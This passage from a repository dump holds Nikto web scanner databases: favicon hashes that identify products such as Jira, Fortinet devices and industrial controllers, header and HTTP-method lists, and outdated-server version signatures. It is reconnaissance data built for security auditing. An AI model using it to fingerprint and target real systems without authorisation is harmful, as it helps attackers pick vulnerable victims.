(3.0.1)\"\n\"500640\",\"a2e38a3b0cdf875cd79017dcaf4f2b55\",\"sork-passwd-h3 (3.0)\"\n\"500641\",\"cb740847c45ea3fbbd80308b9aa4530a\",\"sork-vacation-h3 (3.0.1)\"\n\"500642\",\"7c7b66d305e9377fa1fce9f9a74464d9\",\"spe (0.8.4.h)\"\n\"500643\",\"0e2503a23068aac350f16143d30a1273\",\"sql-ledger (2.8.15)\"\n\"500644\",\"1fd3fafc1d461a3d19e91dbbba03d0aa\",\"tea (17.6.1)\"\n\"500645\",\"4644f2d45601037b8423d45e13194c93\",\"Apache Tomcat (possibly 5.5.26 through 8.0.15), Alfresco Community\"\n\"500646\",\"1de863a5023e7e73f050a496e6b104ab\",\"torrentflux (2.4)\"\n\"500647\",\"83dea3d5d8c6feddec84884522b61850\",\"torrentflux (2.4) - themes/G4E/\"\n\"500648\",\"d1bc9681dce4ad805c17bd1f0f5cee97\",\"torrentflux (2.4) - themes/BlueFlux/\"\n\"500649\",\"8d13927efb22bbe7237fa64e858bb523\",\"transmission (1.34)\"\n\"500650\",\"5b015106854dc7be448c14b64867dfa5\",\"tulip (3.0.0~B6)\"\n\"500651\",\"ff260e80f5f9ca4b779fbd34087f13cf\",\"Horde Groupware Webmail 1.0.1 (Turba Theme, 2.1.7)\"\n\"500652\",\"e7fc436d0bf31500ced7a7143067c337\",\"twiki (4.1.2) - logos/favicon.ico\"\n\"500653\",\"9789c9ab400ea0b9ca8fcbd9952133bd\",\"twiki (4.1.2) - webpreferences \"\n\"500654\",\"2b52c1344164d29dd8fb758db16aadb6\",\"vdr-plugin-live (0.2.0)\"\n\"500655\",\"237f837bbc33cd98a9f47b20b284e2ad\",\"vdradmin-am (3.6.1) \"\n\"500656\",\"6f7e92fe7e6a62661ac2b41528a78fc6\",\"vlc (0.9.4)\"\n\"500657\",\"2507c0b0a60ecdc816ba45482affaedf\",\"webcheck (1.10.2.0) \"\n\"500658\",\"ef5169b040925a716359d131afbea033\",\"websvn (2.0) \"\n\"500659\",\"f6d0a100b6dbeb5899f0975a1203fd85\",\"witty (2.1.5)\"\n\"500660\",\"81feac35654318fb16d1a567b8b941e7\",\"yaws (1.77)\"\n\"500661\",\"33b04fb9f2ec918f5f14b41527e77f6d\",\"znc (0.058)\"\n\"500662\",\"6434232d43f27ef5462ba5ba345e03df\",\"znc (0.058, webadmin/skins/default)\"\n\"500663\",\"e07c0775523271d629035dc8921dffc7\",\"zoneminder (1.23.3)\"\n\"500664\",\"4eb846f1286ab4e7a399c851d7d84cca\",\"Plone CMS (3.1.1)\"\n\"500665\",\"e298e00b2ff6340343ddf2fc6212010b\",\"Nessus 4.x Scanner Web Client\"\n\"500666\",\"240c36cd118aa1ff59986066f21015d4\",\"LANCOM Systems\"\n\"500667\",\"ceb25c12c147093dc93ac8b2c18bebff\",\"COMpact 5020 VoIP\"\n\"500668\",\"05656826682ab3147092991ef5de9ef3\",\"RapidShare\"\n\"500669\",\"e19ffb2bc890f5bdca20f10bfddb288d\",\"Rapid7 (NeXpose)\"\n\"500670\",\"1f8c0b08fb6b556a6587517a8d5f290b\",\"owasp.org\"\n\"500671\",\"73778a17b0d22ffbb7d6c445a7947b92\",\"Apache on Mac OS X\"\n\"500672\",\"799f70b71314a7508326d1d2f68f7519\",\"JBoss Server\"\n\"500673\",\"bd0f7466d35e8ba6cedd9c27110c5c41\",\"Serena Collage (4.6, servlet/images/collage_app.ico)\"\n\"500674\",\"dc0816f371699823e1e03e0078622d75\",\"Aruba Network Devices (HTTP(S) login page)\"\n\"500675\",\"f097f0adf2b9e95a972d21e5e5ab746d\",\"Citrix Access Server\"\n\"500676\",\"28893699241094742c3c2d4196cd1acb\",\"Xerox DocuShare\"\n\"500677\",\"80656aabfafe0f3559f71bb0524c4bb3\",\"Macromedia Breeze\"\n\"500678\",\"48c02490ba335a159b99343b00decd87\",\"Octeth Technologies oemPro (3.5.5.1)\"\n\"500679\",\"eb6d4ce00ec36af7d439ebd4e5a395d7\",\"Mailman\"\n\"500680\",\"04d89d5b7a290334f5ce37c7e8b6a349\",\"Atlassian Jira Bug Tracker\"\n\"500681\",\"d80e364c0d3138c7ecd75bf9896f2cad\",\"Apache Tomcat (6.0.18), Alfresco Enterprise Content Management System\"\n\"500682\",\"a6b55b93bc01a6df076483b69039ba9c\",\"Fog Creek Fogbugz (6.1.44)\"\n\"500683\",\"ee4a637a1257b2430649d6750cda6eba\",\"Trimble Device Embedded Web Server\"\n\"500684\",\"9ceae7a3c88fc451d59e24d8d5f6f166\",\"Plesk managed system\"\n\"500685\",\"69ae01d0c74570d4d221e6c24a06d73b\",\"Roku Soundbridge\"\n\"500686\",\"2e9545474ee33884b5fb8a9a0b8806dd\",\"Ampache\"\n\"500687\",\"639b61409215d770a99667b446c80ea1\",\"Lotus Domino Server\"\n\"500688\",\"be6fb62815509bd707e69ee8dad874a1\",\"i.LON server by Echelon\"\n\"500689\",\"a46bc7fc42979e9b343335bdd86d1c3e\",\"NetScout NGenius\"\n\"500690\",\"192decdad41179599a776494efc3e720\",\"JBoss Installation\"\n\"500691\",\"de2b6edbf7930f5dd0ffe0528b2bbcf4\",\"Barracuda Spam/Virus firewall appliance\"\n\"500692\",\"386211e5c0b7d92efabd41390e0fc250\",\"SparkWeb web-based collaboration client. http://www.igniterealtime.org/\"\n\"500693\",\"f89abd3f358cb964d6b753a5a9da49cf\",\"LimeSurvey\"\n\"500694\",\"a7947b1675701f2247921cf4c2b99a78\",\"Alexander Palmo Simple PHP Blog\"\n\"500695\",\"01febf7c2bd75cd15dae3aa093d80552\",\"Atlassian Crucible or Fisheye\"\n\"500696\",\"1275afc920a53a9679d2d0e8a5c74054\",\"Atlassian Crowd\"\n\"500697\",\"12888a39a499eb041ca42bf456aca285\",\"Atlassian Confluence or Crowd\"\n\"500698\",\"3341c6d3c67ccdaeb7289180c741a965\",\"Atlassian Confluence or Crowd\"\n\"500699\",\"6c1452e18a09070c0b3ed85ce7cb3917\",\"Atlassian Jira\"\n\"500700\",\"43ba066789e749f9ef591dc086f3cd14\",\"Atlassian Bamboo\"\n\"500701\",\"a83dfece1c0e9e3469588f418e1e4942\",\"Atlassian Bamboo\"\n\"500702\",\"f0ee98b4394dfdab17c16245dd799204\",\"Drupal\"\n\"500703\",\"7b0d4bc0ca1659d54469e5013a08d240\",\"Netgear (Infrant) ReadyNAS NV+\"\n\"500704\",\"cee40c0b35bded5e11545be22a40e363\",\"OSSDL.de Openmailadmin\"\n\"500705\",\"4f88ba9f1298701251180e6b6467d43e\",\"Xinit Systems Ltd. Openfiler\"\n\"500706\",\"4c3373870496151fd02a6f1185b0bb68\",\"rPath Appliance Agent\"\n\"500707\",\"b231ad66a2a9b0eb06f72c4c88973039\",\"Wordpress\"\n\"500708\",\"e1e8bdc3ce87340ab6ebe467519cf245\",\"Wordpress\"\n\"500709\",\"95103d0eabcd541527a86f23b636e794\",\"Wordpress Multi-User (MU)\"\n\"500710\",\"64ca706a50715e421b6c2fa0b32ed7ec\",\"Parallels Plesk Control Panel\"\n\"500711\",\"f425342764f8c356479d05daa7013c2f\",\"vBulletin forum\"\n\"500712\",\"740af61c776a3cb98da3715bdf9d3fc1\",\"vBulletin forum\"\n\"500713\",\"d7ac014e83b5c4a2dea76c50eaeda662\",\"vBulletin forum\"\n\"500714\",\"a47951fb41640e7a2f5862c296e6f218\",\"Plone CMS\"\n\"500715\",\"10bd6ad7b318df92d9e9bd03104d9b80\",\"Plone CMS\"\n\"500716\",\"e08333841cbe40d15b18f49045f26614\",\"21publish Blog\"\n\"500717\",\"e2cac3fad9fa3388f639546f3ba09bc0\",\"Invision Power Services IP.Board\"\n\"500718\",\"5ec8d0ecf7b505bb04ab3ac81535e062\",\"Telligent Community Server\"\n\"500719\",\"83a1fd57a1e1684fafd6d2487290fdf5\",\"Pligg\"\n\"500720\",\"b7f98dd27febe36b7275f22ad73c5e84\",\"MoinMoin\"\n\"500721\",\"63b982eddd64d44233baa25066db6bc1\",\"Joomla!\"\n\"500722\",\"05bc6d56d8df6d668cf7e9e11319f4e6\",\"Jive Forums\"\n\"500723\",\"63740175dae089e479a70c5e6591946c\",\"The Lyceum Project\"\n\"500724\",\"4cbb2cfc30a089b29cd06179f9cc82ff\",\"Dragonfly\"\n\"500725\",\"9187f6607b402df8bbc2aeb69a07bbca\",\"XOOPS\"\n\"500727\",\"a1c686eb6e771878cf6040574a175933\",\"CivicPlus\"\n\"500728\",\"4d7fe200d85000aea4d193a10e550d04\",\"Intland Software codeBeamer\"\n\"500729\",\"1a9a1ec2b8817a2f951c9f1793c9bc54\",\"Bitweaver\"\n\"500730\",\"1cc16c64d0e471607677b036b3f06b6e\",\"Roller Weblogger Project\"\n\"500731\",\"7563f8c3ebd4fd4925f61df7d5ed8129\",\"Holger Zimmerman Pi3Web HTTP Server\"\n\"500732\",\"7f0f918a78ca8d4d5ff21ea84f2bac68\",\"SubText\"\n\"500733\",\"86e3bf076a018a23c12354e512af3b9c\",\"Spyce\"\n\"500734\",\"9c003f40e63df95a2b844c6b61448310\",\"DD-WRT Embedded Web Server\"\n\"500735\",\"9a9ee243bc8d08dac4448a5177882ea9\",\"Dvbbs Forum\"\n\"500736\",\"ee1169dee71a0a53c91f5065295004b7\",\"ProjectPier\"\n\"500737\",\"7214637a176079a335d7ac529011f4e4\",\"phpress\"\n\"500738\",\"1bf954ba2d568ec9771d35c94a6eb2dc\",\"WoltLab Burning Board\"\n\"500739\",\"ff3b533b061cee7cfbca693cc362c34a\",\"Kayako SupportSuite\"\n\"500740\",\"428b23df874b41d904bbae29057bdba5\",\"Comsenz Technology Ltd ECShop\"\n\"500741\",\"8757fcbdbd83b0808955f6735078a287\",\"Comsenz Technology Ltd Discuz!\"\n\"500742\",\"9fac8b45400f794e0799d0d5458c092b\",\"Comsenz Technology Ltd Discuz!\"\n\"500743\",\"4e370f295b96eef85449c357aad90328\",\"Comsenz Technology Ltd SupeSite\"\n\"500744\",\"4cfbb29d0d83685ba99323bc0d4d3513\",\"PHPWind Forums 7\"\n\"500745\",\"2df6edffca360b7a0fadc3bdf2191857\",\"PIPS Technology ATZ Executive / Automatic Licence Plate Recognition (ALPR) System\"\n\"500746\",\"8c291e32e7c7c65124d19eb17bceca87\",\"Schneider Electric Modicon 340 / BMX P34 CPU B\"\n\"500747\",\"6dcab71e60f0242907940f0fcda69ea5\",\"Ubiquiti Ubiquiti M Series / AirOS\"\n\"500748\",\"09a1e50dc3369e031b97f38abddd10c8\",\"Ubiquiti Ubiquiti M Series / AirOS\"\n\"500749\",\"7b345857204926b62951670cd17a08b7\",\"AXESS TMC X1 or X2 Terminal\"\n\"500750\",\"0f584138aacfb79aaba7e2539fc4e642\",\"Plex Media Server\"\n\"500751\",\"4973c3c3067f8526ad0dacd2823b814e\",\"Adobe Experience Manager/CQ5\"\n\"500752\",\"7a52b2a795dabe950e9dd2381ded8dc7\",\"Adobe CRXDE Lite\"\n\"500753\",\"5a77e47fa23554a4166d2303580b0733\",\"Sawmill\"\n\"500754\",\"39a1599714e68d8d9af295f8dc5ab314\",\"Apache\"\n\"500755\",\"ca5aeaaabc9019eb5ce8e03ec3bd809d\",\"Apache\"\n\"500756\",\"fc4f0fca3dc008655feb2563fa7bbdd2\",\"Apache\"\n\"500757\",\"ab5fbb78e839bac0eee74787740475e8\",\"Apache\"\n\"500758\",\"f4d83423148320676d1db1269c333da2\",\"Apache\"\n\"500759\",\"a2b03592bd74d3bf6b71a327a4b39ff6\",\"Apache\"\n\"500760\",\"e2f638a6572e9270ac73402f6481425b\",\"Apache\"\n\"500761\",\"2b354dcd9968722567eaf374d6ed2132\",\"Apache\"\n\"500762\",\"4afcc9582b28af45ce8a1312761d8d4c\",\"Apache\"\n\"500763\",\"8d3fd22cab7ad1a6b10ae10e96143333\",\"Apache\"\n\"500764\",\"3e87f7b72db63dfb1700207d0ee0ec13\",\"Apache\"\n\"500765\",\"5d48c15b19222264f533c25943519861\",\"Apache\"\n\"500766\",\"e738f22aab002bd66350d1b2d930e9a9\",\"Apache\"\n\"500767\",\"42bb648e781be6baa099b76e75609126\",\"Apache\"\n\"500768\",\"07e9163f7ca8cfe6c1d773f895fbebad\",\"Apache\"\n\"500769\",\"aa9b62c9aa50e0bc1f77061e6362d736\",\"Apache\"\n\"500770\",\"a4eb4e0aa80740db8d7d951b6d63b2a2\",\"ownCloud\"\n\"500771\",\"56974e6b57c7bd51448c309915ca0d6c\",\"Ghost blog (0.7.x)\"\n\"500772\",\"91b72b23e7f499d6c09cb18c7b1278f1\",\"Kodi Media Center 16.x (Web Interface)\"\n\"500773\",\"92c5d340d08c6d33676a41ba8dece857\",\"Android PAW Server\"\n\"500774\",\"81edeec6e603d73d52bf85a3354fd093\",\"JAMF Software/Casper Suite\"\n\"500775\",\"c1f20852dd1caf078f49de77a2de8e3f\",\"vBulletin forum\"\n\"500776\",\"e462005902f81094ab3de44e4381de19\",\"Fortinet Device\"\n\"500777\",\"b3045c004dd765466e84bd057eaaa795\",\"Skype for Business\"\n\"500778\",\"23e8c7bd78e8cd826c5a6073b15068b1\",\"Jenkins\"\n\"500779\",\"1391664373e72311a656c4a5504682af\",\"Jira\"\n"
  },
  {
    "path": "nikto/program/databases/db_headers",
    "content": "#VERSION,2.008\n#######################################################################\n# File Source: https://cirt.net\n# (c) 2001 Chris Sullo, All Rights Reserved.\n# This file may only be distributed and used with the full Nikto package.\n# This file may not be used with any software product without written permission from\n# Chris Sullo (csullo@gmail.com)\n#\n# Note:\n# By submitting updates to this file you are transferring any and all copyright\n# interest in the data to Chris Sullo so it can modified, incorporated into this product\n# relicensed or reused.\n#######################################################################\n# Notes:\n# - Use lower case letters\n# - Keep list alphabetically (for readability and easy human lookup)\n# Example to get the server headers: $ curl -I www.example.com\n#######################################################################\n\"header\"\n\"accept\"\n\"accept-charset\"\n\"accept-encoding\"\n\"accept-language\"\n\"accept-ranges\"\n\"access-control-allow-credentials\"\n\"access-control-allow-headers\"\n\"access-control-allow-methods\"\n\"access-control-allow-origin\"\n\"access-control-expose-headers\"\n\"access-control-max-age\"\n\"age\"\n\"allow\"\n\"alternates\"\n\"authorization\"\n\"cache-control\"\n\"cf-request-id\"\n\"commerce-server-software\"\n\"connection\"\n\"content-encoding\"\n\"content-language\"\n\"content-length\"\n\"content-location\"\n\"content-md5\"\n\"content-range\"\n\"content-security-policy\"\n\"content-security-policy-report-only\"\n\"content-type\"\n\"dasl\"\n\"date\"\n\"dav\"\n\"etag\"\n\"expect\"\n\"expect-ct\"\n\"expires\"\n\"feature-policy\"\n\"from\"\n\"host\"\n\"if-match\"\n\"if-modified-since\"\n\"if-none-match\"\n\"if-range\"\n\"if-unmodified-since\"\n\"keep-alive\"\n\"last-modified\"\n\"location\"\n\"max-forwards\"\n\"mime-version\"\n\"nel\"\n\"nncoection\"\n\"p3p\"\n\"persistent-auth\"\n\"permissions-policy\"\n\"pragma\"\n\"proxy-authenticate\"\n\"proxy-authorization\"\n\"proxy-connection\"\n\"public\"\n\"range\"\n\"referer\"\n\"referrer-policy\"\n\"report-to\"\n\"retry-after\"\n\"server\"\n\"set-cookie\"\n\"status\"\n\"strict-transport-security\"\n\"te\"\n\"trailer\"\n\"transfer-encoding\"\n\"upgrade\"\n\"user-agent\"\n\"vary\"\n\"via\"\n\"warning\"\n\"whisker\"\n\"www-authenticate\"\n\"x-aspnetmvc-version\"\n\"x-aspnet-version\"\n\"x-cache-hits\"\n\"x-clacks-overhead\"\n\"x-cnection\"\n\"x-content-security-policy\"\n\"x-content-type-options\"\n\"x-download-options\"\n\"x-frame-options\"\n\"x-id\"\n\"xmlns\"\n\"x-dns-prefetch-control\"\n\"x-mod-pagespeed\"\n\"x-pad\"\n\"x-page-speed\"\n\"x-permitted-cross-domain-policies\"\n\"x-pingback\"\n\"x-powered-by\"\n\"x-robots-tag\"\n\"x-ua-compatible\"\n\"x-varnish\"\n\"x-webkit-csp\"\n\"x-xss-protection\"\n\"timing-allow-origin\"\n\"cf-cache-status\"\n\"cf-ray\"\n\"x-cdn\"\n\"link\"\n"
  },
  {
    "path": "nikto/program/databases/db_httpoptions",
    "content": "#VERSION,2.002\n#######################################################################\n# File Source: https://cirt.net\n# (c) 2001 Chris Sullo, All Rights Reserved.\n# This file may only be distributed and used with the full Nikto package.\n# This file may not be used with any software product without written permission from\n# Chris Sullo (csullo@gmail.com)\n#\n# Note:\n# By submitting updates to this file you are transferring any and all copyright\n# interest in the data to Chris Sullo so it can modified, incorporated into this product\n# relicensed or reused.\n#######################################################################\n# Notes:\n# NiktoDB 1.0\n#######################################################################\n\"nikto_id\",\"method\",\"osvdb\",\"message\"\n\"400000\",\"DELETE\",\"5646\",\"HTTP method ('@TYPE@' Header): 'DELETE' may allow clients to remove files on the web server.\"\n\"400001\",\"PUT\",\"397\",\"HTTP method ('@TYPE@' Header): 'PUT' method could allow clients to save files on the web server.\"\n\"400002\",\"MOVE\",\"5647\",\"HTTP method ('@TYPE@' Header): 'MOVE' may allow clients to change file locations on the web server.\"\n\"400003\",\"CONNECT\",\"0\",\"HTTP method ('@TYPE@' Header): 'CONNECT' may allow server to proxy client requests.\"\n\"400004\",\"PATCH\",\"0\",\"HTTP method: 'PATCH' may allow client to issue patch commands to server. See RFC-5789.\"\n# WebDAV methods - \"0\" in nikto_id tells the code to treat it differently\n\"0\",\"PROPFIND\",\"0\",\"webdav\"\n\"0\",\"PROPPATCH\",\"0\",\"webdav\"\n\"0\",\"COPY\",\"0\",\"webdav\"\n\"0\",\"LOCK\",\"0\",\"webdav\"\n\"0\",\"UNLOCK\",\"0\",\"webdav\"\n\"0\",\"SEARCH\",\"0\",\"webdav\"\n\"0\",\"MKCOL\",\"0\",\"webdav\"\n"
  },
  {
    "path": "nikto/program/databases/db_multiple_index",
    "content": "#VERSION,2.005\n#######################################################################\n# File Source: https://cirt.net\n# (c) 2001 Chris Sullo, All Rights Reserved.\n# This file may only be distributed and used with the full Nikto package.\n# This file may not be used with any software product without written permission from\n# Chris Sullo (csullo@gmail.com)\n#\n# Note:\n# By submitting updates to this file you are transferring any and all copyright\n# interest in the data to Chris Sullo so it can modified, incorporated into this product\n# relicensed or reused.\n#######################################################################\n# Notes:\n#######################################################################\n\"index\"\n\"index.php\"\n\"index.php3\"\n\"index.php4\"\n\"index.php5\"\n\"index.php7\"\n\"index.html\"\n\"index.htm\"\n\"index.shtml\"\n\"index.cfm\"\n\"index.cgi\"\n\"index.pl\"\n\"index.asp\"\n\"index.aspx\"\n\"default.asp\"\n\"default.aspx\"\n\"default.htm\"\n\"index.do\"\n\"index.jhtml\"\n\"index.jsp\"\n\"index.xml\"\n"
  },
  {
    "path": "nikto/program/databases/db_outdated",
    "content": "#VERSION,2.017\n#######################################################################\n# File Source: https://cirt.net\n# (c) 2001 Chris Sullo, All Rights Reserved.\n# This file may only be distributed and used with the full Nikto package.\n# This file may not be used with any software product without written permission from\n# Chris Sullo (csullo@gmail.com)\n#\n# Note:\n# By submitting updates to this file you are transferring any and all copyright\n# interest in the data to Chris Sullo so it can modified, incorporated into this product\n# relicensed or reused.\n#######################################################################\n# Notes:\n# NiktoDB 1.0\n#######################################################################\n\"nikto_id\",\"server\",\"version\",\"message\"\n\"600000\",\"\\(www\\.ebdesk\\.com\\)/\",\"1.3.20\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600001\",\"0W/\",\"0.6\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600002\",\"3Com/\",\"1.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600003\",\"3Com/v\",\"1.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600004\",\"4D_WebStar_D/\",\"7.5\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600005\",\"4D_WebSTAR_S/\",\"5.4.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600006\",\"4n4l0g4l1f3/\",\"31337\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600007\",\"a-p-a-c-h-e/\",\"1-3-26\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600008\",\"ABWS/\",\"537\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600009\",\"Abyss/\",\"2.11.0.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600010\",\"AbyssLib/\",\"2.11.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600011\",\"Academy/\",\"5.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600012\",\"accela/\",\"1.92\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600013\",\"Accipiter-DirectServer/\",\"6.0.0.36\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600014\",\"ACI-4D/\",\"6.57\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600015\",\"Acme\\.Serve/\",\"v1.7\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600016\",\"ActiveAgent/\",\"4.2\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600017\",\"ActiveLinks/\",\"0.3\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600018\",\"ActuateHttpService/\",\"1.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600019\",\"Adaptec ASM \",\"1.1\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600020\",\"ADSM_HTTP/\",\"0.1\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600021\",\"AdSubtract\",\"2.54\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600022\",\"adtag/\",\"1.0a\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600023\",\"Adtran Embedded HTTP Server \",\"1.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600024\",\"aEGiS_nanoweb/\",\"2.2.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600025\",\"AG/\",\"1.3.27\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600026\",\"AGAVA.Banners/\",\"1.10\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600027\",\"Agent-ListenServer-HttpSvr/\",\"1.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600028\",\"Agranat-EmWeb/\",\"R5_2_6\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600029\",\"Agranat/\",\"Agranat-EmWeb/R5_2_6\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600030\",\"Alchemy Eye/\",\"Alchemy Eye/3.0.10\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600031\",\"AlkalineSearchEngine/\",\"1.\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600032\",\"Allegro-Software-RomPager/\",\"4.61\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600033\",\"AllegroServe/\",\"1.2.24\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600034\",\"AMOS-HTTPD/\",\"1.5A127\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600035\",\"AMOS/\",\"1.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600036\",\"Analogx\",\"1.0.7\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600037\",\"Anonymous/\",\"1\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600038\",\"anses/\",\"1.16\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600039\",\"AnWeb/\",\"1.42p\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600040\",\"AOLserver/ \",\"4.5.1\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600041\",\"Apache Coyote/\",\"1.1\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600042\",\"Apache Tomcat/\",\"Apache Tomcat/8.0.15\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER). Tomcat 7.0.57, 6.0.41, 5.5.36 and 4.1.40 are also current.\"\n\"600044\",\"Apache-AdvancedExtranetServer/\",\"2.0.53\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600045\",\"Apache-Coyote/\",\"1.1\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600046\",\"Apache-NeoNova/\",\"1.3.27\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600047\",\"Apache-NeoWebScript/\",\"2.3\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600048\",\"Apache-SSL-US/\",\"1.1.1+1.2+1.3b3-dev\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600049\",\"Apache-SSL/\",\"1.36\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600050\",\"Apache/\",\"Apache/2.4.54\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER). Apache 2.2.34 is the EOL for the 2.x branch.\"\n\"600051\",\"apachejserv/\",\"1.1.2i\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600052\",\"ApacheSSL/\",\"2.0.58\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600053\",\"AppleEmbeddedWebServer/\",\"1.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600054\",\"AppleShareIP/\",\"6.3.3\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600055\",\"ARIN-HTTPd/\",\"1.7\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600056\",\"ARM/\",\"06TD.34\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600057\",\"ArtBlast/\",\"3.5.5\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600058\",\"ASP/\",\"4.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600059\",\"AtermWARPSTAR/\",\"1.0.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600060\",\"auth_external/\",\"2.2.1\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600061\",\"auth_kerberos/\",\"4.11\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600062\",\"auth_ldap/\",\"1.6.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600063\",\"auth_mysql/\",\"1.11\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600064\",\"auth_radius/\",\"1.7PR1\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600065\",\"AuthentiCache/\",\"2.0.6\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600066\",\"AuthMySQL/\",\"4.3.9-2\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600067\",\"AuthMySQL/\",\"deam.org-1.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600068\",\"AuthMySQL/\",\"trans-1.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600069\",\"AuthMySQLD/\",\"0.1\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600070\",\"AuthNuSphere/\",\"1.0.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600071\",\"AuthPG/\",\"1.3\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600072\",\"AuthPostgreSQL/\",\"0.9.7d\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600073\",\"AuthSMB/\",\"0.3\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600074\",\"AuthTDS/\",\"1.1\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600075\",\"AV/\",\"1.0.1\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600076\",\"Awhttpd/\",\"Awhttpd/2.2\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600077\",\"AWS/\",\"1.2\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600078\",\"AXISThinWizard/\",\"v3.05.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600079\",\"AxKit/\",\"1.7\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600080\",\"balanced_by_mod_backhand/\",\"1.1.1\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600081\",\"BaseHTTP/\",\"0.6\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600082\",\"BBC \",\"06.21.501\",\"@RUNNING_VER appears to be outdated (current is at least 